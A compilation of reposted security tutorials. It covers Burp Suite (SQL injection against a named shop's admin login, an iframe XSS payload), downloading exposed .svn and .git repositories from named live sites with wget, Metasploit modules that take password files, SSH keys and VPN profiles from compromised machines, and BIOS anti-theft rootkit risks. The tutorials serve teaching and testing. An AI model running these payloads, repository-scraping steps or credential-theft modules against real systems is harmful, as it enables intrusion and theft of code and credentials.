automated manner, giving it more of the target to spider. Thread count is the number of concurrent threads being used. For local testing, this count can be high; a higher thread count implies faster processing but also a larger load. Occasional pop-ups appear asking to change the scope; depending on the set-up, we can answer either yes or no. Once we are done spidering the target, we use the scanner. 
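At its core, what the spider does per page is extract every link so each can be queued and visited in turn. A toy sketch of that one step, using Python's stdlib HTML parser (the HTML snippet is made up):

```python
# Minimal link extraction -- the per-page building block of a spider.
from html.parser import HTMLParser

class LinkCollector(HTMLParser):
    """Collects the href of every <a> tag seen while parsing."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

page = '<a href="/login">Login</a> <a href="/search?q=x">Search</a>'
collector = LinkCollector()
collector.feed(page)
print(collector.links)  # ['/login', '/search?q=x']
```

A real spider would then fetch each collected link (restricted to the testing scope) and repeat.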
I am using the free edition of the Burp suite, so the scanner is disabled in it. The professional edition has fully functional scanners. The scanner is used to run tests. There are two types of tests: active and passive. Active tests send data and analyze the responses. Passive tests examine all traffic and determine the vulnerabilities present in the application. It's left to the user's discretion to choose the type of tests that need to be run against the target. Burp-Intruder The intruder has 4 panels as seen in the figure, namely target, positions, payloads and options. Target: This panel is used to specify the target host (the URL) and the port to use for the connection, and it also gives options for using SSL encryption depending on our scenario. The figure below shows the target panel. Positions: This panel is very important for automating attack strings on the target. There are various kinds of attack vectors, such as the sniper attack, battering ram attack, pitchfork attack and cluster bomb. On observing the figure, we see that the payload positions are automatically highlighted with a "§" character. This happens when you click on the auto button to the right. You can also add markers and customize them. The clear option is used to clear all the markers on the page. A sniper attack uses a single payload set. Here, only one value is replaced across the payload positions, one after the other. Battering ram is another form of single-payload attack. It is used when the same single value is needed in all payload positions. Battering ram works well when the password quality rules and policies in place are weak. A lot of enumeration has to be done before using this form of attack, since it works in a scenario where, for example, the username and password both have the same value. A pitchfork attack, as we are going to see, is used when we need multiple payload sets. 
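The difference between the multi-payload modes is easy to sketch: pitchfork walks its payload lists in lockstep, pairing items positionally, while cluster bomb (described next) runs every item of one list against every item of the other. A toy illustration with made-up wordlists:

```python
# How Burp's multi-payload modes combine two wordlists (made-up values).
from itertools import product

usernames = ["admin", "root"]
passwords = ["' OR '1'='1", "password123"]

# Pitchfork: lists are walked in lockstep, pairing items positionally.
pitchfork = list(zip(usernames, passwords))

# Cluster bomb: every item of one list against every item of the other.
cluster_bomb = list(product(usernames, passwords))

print(len(pitchfork), len(cluster_bomb))  # 2 4
```

With lists of length m and n, pitchfork issues min(m, n) requests while cluster bomb issues m by n, which is why the latter suits login forms where any username/password pairing might work.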
A cluster bomb is another form of multiple-payload attack vector. In a cluster bomb attack, there are two lists; every word in the first list runs against every word in the second list. It is effectively used when the target has a login form which has to be breached. In this section, I am going to demonstrate a SQLi attack on the demo page of etopshop at the following URL: http://www.etopshop.com/demo/pcstore/admin.asp SQL injection testing using Burp-intruder After capturing the page as described, I chose my payload markers as the username and password fields. From here, I deduced that since the attack requires two parameters, I need a multiple-payload attack. I chose the pitchfork attack vector from the dropdown menu. The figure shows the options being set for the attack. I chose the preset list to add my SQL attack strings to be tried against the target. In the figure, we see that we can add and save the preset list of payloads, etc. We have a lot of options under the payload set. To mention a few, there are character based, number based, random characters based, brute force, dates, etc. As you can see, I have used the preset list. The figure shows the process of SQL injection once you click on start-attack. The results tab shows the payloads being sent to the target. The request tab shows the HTML source and how the payloads are placed at our chosen markers. Another tab of interest is the response tab. Here, when we analyze the HTML source, we see that the injection succeeded and we have been welcomed as the store manager. To see the web page, we can even click on render. In the figure, we see the successful penetration of the web application using the famous SQL injection vulnerability. Similarly, XSS vulnerabilities can be checked for, which I shall leave to the intuition of the reader. Burp-Repeater In this section, we shall see the Burp-repeater. 
This tool is generally used to manually modify HTTP requests and test the responses given by the page. This can even lead to probing for vulnerabilities on the web page. Basically, it is used to replay requests to the server. Understanding XSS with Burp-Repeater We shall use a vulnerable web application at: Simple Cookie Stealing for understanding and analyzing an XSS (cross-site scripting) vulnerability in a webpage. In the figure, I have highlighted the attack spot on the webpage, which takes the input, and we will try probing for XSS vulnerabilities. Now, we pass a script tag; the attack string I use is a very simple piece of JavaScript in an iframe: <iframe src="javascript:alert('XSS')"></iframe> We see that the iframe code is injected into the source of the web page. When we check in the browser to confirm whether there is an XSS bug present in the application, we see that there is a reflected XSS vulnerability on the target, as shown in the figure. Burp Sequencer If we want to check the extent of randomness in the session tokens generated by the web application, this is a tailor-made tool to carry out such tests. Brute force attacks enumerate every possible combination for gaining authentication to the web application, which makes a high degree of randomness in the session token IDs a serious requirement. Let's start by sending a request which contains a session token. In this figure you can see the token request to the site Google.com. The right side of the screenshot has the token start and token end expressions. We can either specify an expression like "Google" or set the offset from where the token has to start. The same holds for the token end panel, where we can set the delimiter or a fixed length for the capture. After fixing these parameters, we can click START CAPTURE. The start capture action panel looks like the screenshot above. It sends requests to the target and gives a detailed analysis of the randomness in the cookie tokens. 
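The "randomness" the sequencer scores is, at heart, an entropy measurement. As a rough illustration of the idea only (Burp's real analysis is a battery of character- and bit-level statistical tests, not this), here is a toy Shannon entropy over sampled tokens:

```python
# Toy Shannon entropy over token characters -- a stand-in for the kind
# of randomness measurement the sequencer automates. This is NOT Burp's
# actual test suite, just the underlying idea. Token samples are made up.
import math
from collections import Counter

def shannon_entropy(tokens):
    """Bits of entropy per character across all sampled tokens."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

weak = ["AAAA1", "AAAA2", "AAAA3"]    # mostly constant -> low entropy
strong = ["k9x2Q", "Zp7Lm", "c4Rv8"]  # varied -> higher entropy
print(shannon_entropy(weak) < shannon_entropy(strong))  # True
```

The lower the measured entropy, the smaller the space a brute-force attack has to enumerate.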
We can pause/stop the analysis whenever we wish. I stopped the scan mid-way to see the results of the analysis up to the paused point. The screenshot below explains the results better. The scan components are as follows: Overall result Effective Entropy Reliability Sample size considered Burp analyzes this aspect automatically and generates this report in the sequencer tool. Other analysis types are character-level analysis, which tells us the degree of confidence in the randomness of the sample through a graphical display, and bit-level analysis, which is the same analysis done at the bit level. You have the choice to pad characters in the options panel and also to decode in base64 if needed. Burp Decoder This tool enables you to send a request to the decoder. Within the decoder, we have multiple options to encode the request into various formats like base64, URL encoding, etc. There are also options to convert the same to hashes like MD5, SHA-1, etc. The above screenshot shows the Burp decoder for a request. If we have an encoded request like the one in the following screenshot, the upper part is the request encoded in base64 format and the lower part is the request decoded into clear text. I have encoded the entire request; we can also selectively choose a portion of the request to be decoded/encoded. This mainly comes into use when there is client-side encoding of the username and password in commonly used hashes or encoders. The username/password field can be selectively decoded and the contents viewed in clear text form. Burp Comparer Burp comparer is used when we have to compare two sets of data. The two sets can be the responses received for two different requests. We can compare on the word scale or the byte scale. The comparison shown here is of two different requests to a website. The screenshot below shows the comparison. The comparison can be done in two ways: bit-by-bit comparison and word-by-word comparison. 
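The word-by-word comparison just described can be sketched in a few lines with Python's difflib; the two "responses" below are made up and differ only in the greeted user:

```python
# Word-by-word comparison of two HTTP responses, similar in spirit to
# what the comparer reports. The response strings are illustrative.
import difflib

resp_a = "HTTP/1.1 200 OK Welcome back guest".split()
resp_b = "HTTP/1.1 200 OK Welcome back admin".split()

# Keep only the words that were removed (-) or added (+).
diff = [d for d in difflib.ndiff(resp_a, resp_b) if d.startswith(("-", "+"))]
print(diff)  # ['- guest', '+ admin']
```

Spotting exactly which words change between two responses (for example, between a failed and a successful login) is what makes this kind of comparison useful.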
Burp automates this process for the user and compares the two requests or responses accordingly. This ends the tutorial on Burp-suite. The extent to which Burp-suite can be used can only be left to the imagination of the user. The scanner is not covered in this series because it’s not available in the free edition of Burp. In the commercial edition, the scanner module is fully functional, though with some false positives like any other application. Sursa InfoSec Institute Resources - Quick and Dirty BurpSuite Tutorial
6. 1. Introduction We all know that when programming in a small or large team, having revision control in place is mandatory. We can choose from a number of revision control systems. The following ones are in widespread use worldwide: CVS was one of the first revision control systems, and is therefore very simple, but can still be used for backing up files. SVN (Subversion) is one of the most widespread revision control systems today. Git was created by Linus Torvalds and its main feature is its decentralized code view. Mercurial is very similar to Git, but somewhat faster and simpler. Bazaar is similar to Git and Mercurial, but easier. In this article we'll take a look at revision control systems accessible over HTTP/HTTPS and what we can gain from them. We all know that most revision control systems can be configured to be accessible over proprietary protocols, SSH, HTTP, etc. We also know that most of the time we need to possess a username and password to get access to an SSH-protected Git repository, for example. But HTTP/HTTPS is not a protocol where everything is strictly protected by default; over HTTP/HTTPS we must intentionally protect the directory where a revision control system lives to guard it from unauthorized use. This is why we'll take a look at what we can do with publicly accessible (over HTTP) revision control systems. 2. Getting Usable Info from an SVN Repository If we Google for the string presented in the picture below, results containing publicly available SVN revision control systems using HTTP as the transport protocol are shown. The search string looks for ".svn" directories with "Index of" title strings. If we search with only the ".svn" criterion, only irrelevant results are found. 
In the picture above we can see that the search query found two publicly accessible SVN systems: Index of /.svn Index of /.svn If we try to access one of those links, the SVN directory is presented to us as shown below: In the .svn/ directory we can see standard SVN files and folders. This usually happens because the DocumentRoot (the web page) is part of the SVN repository, which also contains the folder .svn/ that is not appropriately protected. The .svn/ directory holds administrative data about that working directory to keep a revision of each of the files and folders contained in the repository, among other things. The entries file is the most important file in the .svn directory, because it contains information about every resource in a working copy directory. It keeps information about almost anything a Subversion client is interested in. What happens if we try to check out the project? We can see that in the output below:

# svn co http://neo-layout.org/.svn neo
svn: Repository moved permanently to 'http://neo-layout.org/.svn/'; please relocate

We can see that we can't check out the project, which makes sense, because we're trying to check out the .svn folder itself. We should check out the root of the project, which is /. If we try that, we get the output below:

# svn co http://neo-layout.org/
svn: OPTIONS of 'http://neo-layout.org': 200 OK (http://neo-layout.org)

We're not communicating with the SVN repository, but with Apache instead: notice the 200 OK status code. We can't really check out the project in a normal way. But let's not despair; we can still download the project manually, either by right-clicking every file and saving it to disk or by writing a command that does that automatically for us. 
We can do that with the wget command as follows:

# wget -m -I .svn http://neo-layout.org/.svn/

This will successfully download the SVN repository, as can be seen here:

# ls -al neo-layout.org/
total 56
drwxr-xr-x  3 eleanor eleanor  4096 Oct  2 16:18 .
drwxr-xr-x 75 eleanor eleanor 36864 Oct  2 16:18 ..
drwxr-xr-x  6 eleanor eleanor  4096 Oct  2 16:18 .svn
-rw-r--r--  1 eleanor eleanor  5155 Jul 15  2011 index.html
-rw-r--r--  1 eleanor eleanor    61 Jul 15  2011 robots.txt

The directory neo-layout.org/ was created, which contains the important directory .svn, which in turn contains the entries file. Afterward we can cd into the working directory and issue SVN commands. An example of executing svn status is shown below:

# svn status
!       neo.kbd
!       stylesheet_ie7.css
!       xkb.tgz
!       de
!       windows
!       index_en.html
!       favicon.ico
!       mac
!       installation
!       grafik
!       tastentierchen_fenster.svg
!       kbdneo_ahk.exe
!       svn
!       neo.keylayout
!       download
!       portabel
!       bsd
!       kbdneo32.zip
!       neo_portable.zip
!       installiere_neo
!       neo-logo.svg
!       neo_portable.tar.gz
!       chat
!       tastentierchen_pingu.svg
!       stylesheet.css
!       neo.html
!       tastentierchen_apfel.svg
!       Compose.neo
!       forum
!       neo_kopf_trac_522x50.svg
!       neo_de.xmodmap
!       XCompose
!       linux
!       neo20.exe
!       stylesheet_wiki.css
!       portable
!       kbdneo64.zip

The first column in the output above indicates whether an item was added, deleted or otherwise changed. The whole list of characters that indicate file status can be found in the SVN documentation. All of the listed files are marked missing (!), because we didn't really check out the repository but downloaded it with wget. Nevertheless, we found out quite a lot about the actual files residing in the repository. 
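Since every file listed by svn status lives in the repository, each name is also a candidate path under the site's DocumentRoot. A small sketch that turns the status output into URLs to probe (hostname and file names follow the example above):

```python
# Turn the missing-file names from `svn status` into candidate URLs
# under the site's DocumentRoot. A trimmed sample of the output above:
status_output = """\
!       stylesheet_ie7.css
!       index_en.html
!       favicon.ico
"""

base = "http://neo-layout.org/"
candidates = [base + line.split()[1]
              for line in status_output.splitlines()
              if line.startswith("!")]
print(candidates)
```

Each candidate URL can then be requested to see whether the repository file is directly exposed by the web server.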
Hm, maybe those files are actually accessible in the Apache DocumentRoot directory. Let's try to access stylesheet_ie7.css, which should be present. In the picture above we can see the contents of the file stylesheet_ie7.css, which is indeed present in the DocumentRoot. We could have bruteforced the name of that file with DirBuster, but this is easier and more accurate. We can try to download other files as well, which might provide us with more intel. Let's also try to run svn update:

# svn update
svn: Unable to open an ra_local session to URL
svn: Unable to open repository 'file:///sol/svn/neo/www'

We were of course unable to execute that command successfully, but something interesting popped up: the name of the folder which holds the actual repository is /sol/svn/neo/www. The svn info command provides additional information about the repository:

# svn info
Path: .
URL: file:///sol/svn/neo/www
Repository Root: file:///sol/svn/neo
Repository UUID: b9310e46-f624-0410-8ea1-cfbb3a30dc96
Revision: 2429
Node Kind: directory
Schedule: normal
Last Changed Author: martin_r
Last Changed Rev: 2399
Last Changed Date: 2011-06-25 10:56:02 +0200 (Sat, 25 Jun 2011)

Notice the author, the last changed revision number and the last changed date. That's quite something. 3. Getting Usable Info from a GIT Repository This is inherently the same as with SVN repositories, but let's discuss Git repositories a little further. We can use the same kind of search query, ".git" with "intitle:index of", which will search for all indexed .git repositories online. The picture below shows such a query made against the Google search engine: Among the many publicly accessible .git repositories, the following two were the first ones: Index of /.git www.bjphp.org/.git/ Let's again try to check out the repository. 
We can do that with the git clone command as shown below:

# git clone http://www.claytonking.com/.git/
Cloning into 'www.claytonking.com'...
fatal: http://www.claytonking.com/.git/info/refs not valid: is this a git repository?

We are again unsuccessful in cloning the repository, for the same reason as with SVN repositories: the actual repository is the Apache DocumentRoot directory. If we try to clone from that directory we're also not successful:

# git clone http://www.claytonking.com/
Cloning into 'www.claytonking.com'...
fatal: http://www.claytonking.com/info/refs not valid: is this a git repository

Never mind, we'll use the same approach as we did with SVN repositories, with the wget command as follows:

# wget -m -I .git http://www.claytonking.com/.git/
--2012-10-02 16:59:25--  http://www.claytonking.com/.git/
Resolving www.claytonking.com... 174.143.64.58
Connecting to www.claytonking.com|174.143.64.58|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 249
Saving to: `www.claytonking.com/.git/index.html'

100%[==========================>] 249 --.-K/s in 0s

Last-modified header missing -- time-stamps turned off.
2012-10-02 16:59:25 (27.6 MB/s) - `www.claytonking.com/.git/index.html' saved [249/249]

FINISHED --2012-10-02 16:59:25--
Total wall clock time: 0.3s
Downloaded: 1 files, 249 in 0s (27.6 MB/s)

The wget command failed to download the .git directory. Why? We can quickly find out that access to that directory is denied, as can be seen in the picture below: So that repository is properly secured against our attack. Let's try another repository, located at Index of /.git. 
If we try to open it in a web browser, it opens up successfully, which means that the wget command will also succeed. The following picture presents accessing the .git/ repository at the host www.bjphp.org: To download the repository we can execute the following command:

# wget -m -I .git http://www.bjphp.org/.git/

Once the repository is downloaded, we can cd into it and issue git commands. Note that the repository is quite big, so it will take some time to download fully. If we try to execute git status we get an error about a bad HEAD object:

# git status
fatal: bad object HEAD

But we should be able to execute the git status command, since all the information is contained in the .git/ folder. First we need to correct the HEAD pointer to point to the latest commit. We can do that by editing the .git/refs/heads/master file and replacing the non-existing hash with an existing one. All the hashes can be found by executing the command below:

# find .git/objects/
...
.git/objects/2f/e5c0f9c7ca304f0e32c40df8c3d0ca17d3fa51
.git/objects/2f/99dae8e6ef73e91a5d6283d2a732b6372d5e27
.git/objects/2f/1d58759d8640c62ad5fe0a4778a9474dc8abcc
.git/objects/2f/48ccd102e392b27af0301078d90abf0bced7d0
.git/objects/2f/e318d9a6305702a7555859acedcec549371534
.git/objects/2f/index.html
.git/objects/2f/86f0ae6bb797bf29700cb1d0d93e5e30a4e72b

The output was truncated, but we can still see six hashes that we can use. Note that the two-character directory name is the first part of each object hash, so the last object is 2f86f0ae6bb797bf29700cb1d0d93e5e30a4e72b. Let's put that hash into the .git/refs/heads/master file and then execute the git status command:

# git status | head
#
# Initial commit
#
# Changes to be committed:
#   (use "git rm --cached <file>..." to unstage)
#
#	new file:   mainsite/.files.list
#	new file:   mainsite/index.php
#	new file:   mainsite/license.txt
#	new file:   mainsite/readme.html

The command obviously succeeded; it printed the modified, added and deleted files as of the 2f86f0ae6bb797bf29700cb1d0d93e5e30a4e72b commit. We can immediately see that the site is running WordPress, and all of the filenames are printed as well. Afterward we can easily find out the names of the plugins the website is using with the command below:

# git status | grep "wp-content/plugins" | sed 's/.*wp-content\/plugins\/\([^\/]*\).*/\1/' | sort | uniq | grep -v ".php"
akismet
easy-table
facebooktwittergoogle-plus-one-share-buttons
jetpack
websimon-tables

We could have written a better sed query, but it works for our example. If we try to access one of the listed files in a web browser, we can see that the files are indeed accessible, as can be seen below: 4. Conclusion We've seen how to pull various information from SVN and Git repositories, but we could easily have done the same with other repository types. Having a repository publicly accessible can even lead to a total website defacement, if a file is found that contains passwords and is accessible via the web browser. To protect ourselves we should never leave unprotected .git/ repositories online for everyone to see. At the very least we should write a corresponding .htaccess file to provide some protection. Sursa InfoSec Institute Resources - Hacking SVN, GIT, and MERCURIAL
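Picking up the closing advice above: a sketch of what such a protection rule might look like, assuming Apache's mod_alias is enabled (a server-config <DirectoryMatch> block with "Require all denied" is an alternative):

```apache
# Hide version-control metadata: respond 404 to any path containing
# a .svn, .git, .hg or .bzr segment. Works in .htaccess or server config.
RedirectMatch 404 /\.(svn|git|hg|bzr)(/|$)
```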
7. Introduction I guess we all know what Metasploit is, so we don't really need to present the basics of Metasploit to the reader. But it's still useful to present the types of modules Metasploit has: Auxiliary modules perform scanning and sniffing and provide us with tons of information when doing a penetration test. Post modules gather more information or obtain more privileges on an already compromised target machine. Encoders are used to encode the payload so that it is not detected by anti-virus software. Exploits are used to actually exploit a specific host. Payloads are the actual instructions that will be executed on the target host. Payloads can be divided into singles, which can be used standalone, like adding a user to the system; stagers, which usually set up a network connection between the victim and the attacker; and stages, which are downloaded by the stager payloads. The stagers and stages provide execution of multi-stage payloads, which can be used whenever we don't have enough space within a certain vulnerability but would still like to execute a certain payload on the target system. Q on Github The Q Metasploit Exploit Pack is a collection of modules gathered over time which were not accepted into the main Metasploit trunk. Currently the Q trunk contains only two auxiliary modules and four post modules, which we'll look into in the rest of the article. To use the Q exploit modules, we could download the individual modules manually and include them in the system's Metasploit modules path, but there's a better way. First we need to clone the repository as follows:

# git clone https://github.com/mubix/q.git

Afterwards, the q/ directory will be created, holding all the files and folders from the git repository. 
We can copy the q/modules/ directory under the ~/.msf4/modules directory and run the msfconsole command, which will load system modules as well as user-defined modules. Alternatively, we could load the modules by using the -m option with msfconsole, which would also load all the system as well as user modules. Another option is loading the directory with the loadpath /path/to/modules command when msfconsole is already running. In our case we copied the modules to the ~/.msf4/modules/ directory and ran msfconsole as follows:

# msfconsole4.4
[-] WARNING! The following modules could not be loaded!
[-] /root/.msf4/modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb: SyntaxError compile error
/root/.msf4/modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb:76: syntax error, unexpected $end, expecting kEND
[-] /root/.msf4/modules/auxiliary/gather/netcrafting.rb: SyntaxError compile error
/root/.msf4/modules/auxiliary/gather/netcrafting.rb:69: syntax error, unexpected ')'

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|______________________________________________________________________________|


       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 903 exploits - 492 auxiliary - 153 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops

msf >

After that, we should be able to load the modules present in the Q exploit pack just fine. 
The Ripecon Module

An example of loading the auxiliary module ripecon.rb from the gather category is presented below:

msf > use auxiliary/gather/ripecon
msf auxiliary(ripecon) > show options

Module options (auxiliary/gather/ripecon):

   Name                Current Setting    Required  Description
   ----                ---------------    --------  -----------
   KEYWORD                                yes       Keyword you want to search for (ex. Microsoft, Google)
   OUTFILE                                no        A filename to store the results of the module
   Proxies                                no        Use a proxy chain
   RHOST               193.0.6.142        yes       The IP address of the RIPE apps server
   RIPE-GRSSEARCH-URI  /whois/grs-search  yes       Path to the RIPE webservice
   RIPE-SEARCH-URI     /whois/search      yes       Path to the RIPE GRS webservice
   RPORT               443                yes       Default remote port
   VHOST               apps.db.ripe.net   yes       The host name running the RIPE webservice

We can use the ripecon module to query the apps.db.ripe.net database to get more information about a certain company. Let's set the keyword to Google and run the module:

msf auxiliary(ripecon) > set KEYWORD Google
KEYWORD => Google
msf auxiliary(ripecon) > run

[*] RIPEcon: Retrieving sources...
[*] Standard search results:
[-] https://apps.db.ripe.net:443/whois/search?source=ripe&source=apnic&source=afrinic&source=test& - Failed to connect or invalid response

[*] GRS search result:

Query Results
=============

 Name     Value
 ----     -----
 descr    "Google" LLC
 inetnum  108.170.192.0 - 108.170.255.255
 inetnum  108.177.0.0 - 108.177.127.255
 descr    12-05894
 inetnum  142.250.0.0 - 142.251.255.255
 descr    1600 Amphitheatre Parkway
 inetnum  172.217.0.0 - 172.217.255.255
 inetnum  173.194.0.0 - 173.194.255.255
 inetnum  193.120.166.64 - 193.120.166.127
 inetnum  195.100.224.112 - 195.100.224.127
 inetnum  195.76.16.136 - 195.76.16.143
 inetnum  199.87.241.32 - 199.87.241.63
 inetnum  207.223.160.0 - 207.223.175.255
 inetnum  209.85.128.0 - 209.85.255.255
 inetnum  212.179.82.48 - 212.179.82.63
 inetnum  212.21.196.24 - 212.21.196.31
 inetnum  213.248.112.64 - 213.248.112.127
 inetnum  213.253.9.128 - 213.253.9.191
 inetnum  216.239.32.0 - 216.239.63.255
 inetnum  216.58.192.0 - 216.58.223.255
 inetnum  217.163.1.64 - 217.163.1.127
 inetnum  46.61.155.0 - 46.61.155.255
 inetnum  64.233.160.0 - 64.233.191.255
 inetnum  66.102.0.0 - 66.102.15.255
 inetnum  66.249.64.0 - 66.249.95.255
 inetnum  70.32.128.0 - 70.32.159.255
 inetnum  + - 70.90.219.55
 inetnum  70.90.219.72 - 70.90.219.79
 inetnum  72.14.192.0 - 72.14.255.255
 inetnum  74.125.0.0 - 74.125.255.255
 inetnum  80.239.142.192 - 80.239.142.255
 inetnum  80.239.168.192 - 80.239.168.255
 inetnum  80.239.174.64 - 80.239.174.127
 inetnum  80.239.229.192 - 80.239.229.255
 inetnum  89.175.162.48 - 89.175.162.55
 inetnum  89.175.165.0 - 89.175.165.15
 inetnum  89.175.35.32 - 89.175.35.47
 inetnum  92.45.86.16 - 92.45.86.31
 inetnum  95.167.107.32 - 95.167.107.63
…

[*] Auxiliary module execution completed

We can see that we've obtained quite a bit of information about the Google netblocks, although some of the entries do not belong to Google. We can get the same information by visiting the webpage apps.db.ripe.net and clicking the "Query" and "Full Text Search (GRS)" links in the menu on the right side of the page, as shown in the picture below:

The NetcRafting Module

This module returns, for each site matching the search, the netblock the site belongs to and the operating system the site runs on. All we need to do is set the KEYWORD variable to the company name and run the module; it automatically returns the results as shown below:

msf > use auxiliary/gather/netcrafting
msf auxiliary(netcrafting) > set KEYWORD Google
KEYWORD => Google
msf auxiliary(netcrafting) > run

[*] NetcRafting results:

Query Results
=============

Site              Netblock     OS
----              --------     --
www.google.com    google inc.  linux
www.google.de     google inc.  linux
www.google.it     google inc.  linux
www.google.fr     google inc.  linux
www.google.co.uk  google inc.  linux
www.google.pl     google inc.  linux

We set the KEYWORD variable to Google to get information about Google. The results have been trimmed for clarity, but we can nevertheless see that the NetcRafting module returned the sites that belong to Google: www.google.com, www.google.de, www.google.it, www.google.fr, www.google.co.uk and www.google.pl, all running Linux. We can get the same result by visiting the Netcraft webpage and searching for the keyword Google, as can be seen in the picture below. There are more than 300 entries, but only seven of them are shown in the picture above.
With this query we can learn the domain names a company is using, their operating systems, and when they were first seen on the Internet (although the first-seen date is only available in the online version of the search, not in the Metasploit module).

The Passwd-shadow-ssh-jacker-meterpreter Module

This is a post-exploitation module that can be used on Linux systems once a session to the target machine is already set up. It tries to download /etc/passwd, /etc/shadow and SSH keys from the target machine. It automatically finds the .ssh folder and tries to download the keys in it, although it may fail if the user the session is running under does not have sufficient permissions. This module is arguably there just for convenience, because if we already have a session open, we can download those files manually with ease. The options the module uses can be seen in the output below:

msf > use post/linux/q/passwd-shadow-ssh-jacker-meterpreter
msf post(passwd-shadow-ssh-jacker-meterpreter) > show options

Module options (post/linux/q/passwd-shadow-ssh-jacker-meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

The Openvpn_profiles_jack Module

This is a post-exploitation module that can be run on Windows. It downloads OpenVPN profiles that can later be imported into an OpenVPN client. The module requires an already open session we can interact with; again, with a session available we could also grab the profiles manually, so the module simply makes things a little easier.
An example of using the module and showing the options it accepts can be seen below:

msf > use post/windows/q/openvpn_profiles_jack
msf post(openvpn_profiles_jack) > show options

Module options (post/windows/q/openvpn_profiles_jack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Conclusion

We've seen how the Q exploit pack can be used together with Metasploit to provide additional modules that didn't make it into the Metasploit trunk. Currently it contains very few modules, but this should change over time as more modules fail to be accepted into the trunk. Whenever we write a new Metasploit module or automate something with Metasploit, we should first contact the Metasploit developers to find out whether the module is eligible for inclusion in the Metasploit trunk. If it isn't, we should add it to the Q exploit pack, so that all the non-accepted modules remain part of the same repository.

Source: InfoSec Resources - A Collection of Metasploit Modules Not Accepted to Main Trunk for Various Legal Reasons
  8. 1. Introduction

In 2006, a laptop containing personal and health data of 26,500,000 veterans was stolen from a data analyst working for the US Department of Veterans Affairs. The data contained the names, dates of birth, and some disability ratings of the veterans. It was estimated that the process of preventing and covering possible losses from the theft would cost between USD 100 million and USD 500 million. One year later, a laptop used by an employee of the UK's largest building society was stolen during a domestic burglary. The laptop contained details of 11 million customers' names and account numbers. The information was unencrypted. Subsequently, the UK's largest building society was fined GBP 980,000 by the Financial Services Authority (FSA). The reason for the fine was failing to have effective systems and controls to manage its information security risks.

From these two examples, it can be inferred that laptop theft is a serious problem that concerns both businesses and individuals. Victims of laptop theft can lose not only their software and hardware, but also sensitive data and personal information that have not been backed up. The current methods to protect the data and to prevent theft include alarms, anti-theft technologies utilized in the PC BIOS, laptop locks, and visual deterrents. This article focuses on the BIOS anti-theft technologies. It starts with an overview of these technologies (Section 2). Next, it discusses the legal (Section 3) and technological problems (Section 4) arising from the use of BIOS anti-theft technologies. Then, it recommends solutions to those problems (Section 5). Finally, a conclusion is drawn (Section 6).

2. Overview of BIOS anti-theft technologies

BIOS anti-theft technologies are embedded in the majority of laptops sold on the market. They consist of two components, namely, an application agent and a persistence module. The application agent is installed by the user.
It periodically provides device and location data to the anti-theft technology vendor. In case a laptop containing an installed application agent is stolen, the anti-theft technology vendor connects to the application agent with the aims of determining the location of the computer and deleting the data stored on the laptop. Upon a request of the owner of the laptop, the anti-theft technology may permanently erase all data contained on the magnetic media. In order to make sure that the data have been deleted properly, some anti-theft technology vendors overwrite the data sectors of the deleted files.

The persistence module is embedded in the BIOS of most laptops during the manufacturing process. The BIOS is the code that runs when the computer is powered on; it initialises the chipset, memory subsystem, devices and diagnostics. The BIOS is also referred to as firmware. The persistence module is activated during the first call of the application agent to the anti-theft technology vendor. The persistence module restores the application agent if it has been removed. For instance, in case a thief steals a computer and reinstalls the operating system, the persistence module will restore the agent. It should be noted that, until the application agent is installed by the user, the persistence module remains dormant. Even if the BIOS is flashed, a persistence module that has been enabled will continue restoring the application agent. This is because the persistence module is stored in a part of the BIOS that cannot be flashed or removed.

3. Legal issues

In principle, if the buyer of a laptop agrees to the installation of an application agent on her computer, there is nothing illegal in the use of anti-theft technologies. However, in some cases, a seller of a laptop may either accidentally activate the application agent before shipping it or sell to the buyer a machine that was originally meant for a customer who ordered a computer with an installed application agent.
When an application agent is installed without the consent of the user, it falls within the definition of a backdoor. A backdoor is a program that gives a remote, unauthorized party complete control over a system by bypassing the normal authentication mechanism of that system. The application agent is not the first case of a backdoor not specifically designed to damage and/or disrupt a system. In April 2000, several e-commerce websites discovered that their Cart32 shopping cart software contained a backdoor password enabling any user to obtain a listing of the passwords of every authorized user on the system. The purpose of the backdoor was to enable technical support personnel to recover the users' passwords. Because the backdoor password was embedded in the program code itself, anyone with access to the software could exploit it undetectably.

The activation of an application agent without the consent of the user infringes most privacy laws around the world. In order to stop the violation of their privacy rights, the affected users may submit a request to the anti-theft vendor to remove the application agent from their computers, and may have recourse to a court. In practice, an affected user often does not even know that the application agent is installed on his or her computer. This is because the agent is very difficult to detect: it runs as a non-descript service and is not listed as an application. The agent does not appear in the programs menu listing or as a system tray icon. Regarding requests for removal submitted to the anti-theft technology vendor, it should be noted that a number of unsatisfied users have complained in online forums about anti-theft technology vendors' failure to respond in time to their questions and requests to have the application agent removed.
For example, one user complains that, despite sending more than five emails to the laptop manufacturer and the anti-theft technology vendor, he did not receive a reply to his request to remove the application agent from his computer. He was not able to reach them even after several phone calls.

4. Technology issues

In 2009, security researchers Anibal Sacco and Alfredo Ortega published an article stating that the implementation of an application agent of a particular vendor embedded in the BIOS has security vulnerabilities. These vulnerabilities can be used for the insertion of a dangerous form of BIOS-enhanced rootkit that can bypass all chipset or installation restrictions and reutilize the existing features offered by the anti-theft technology. A rootkit is software or code that allows a persistent undetectable presence on a computer. The BIOS is the best place a rootkit can attack because it survives reboots and power cycles, leaves no trace on disk, survives and re-infects re-installations of the same operating system (OS), survives and re-infects installations of a new OS, and is difficult to detect and remove.

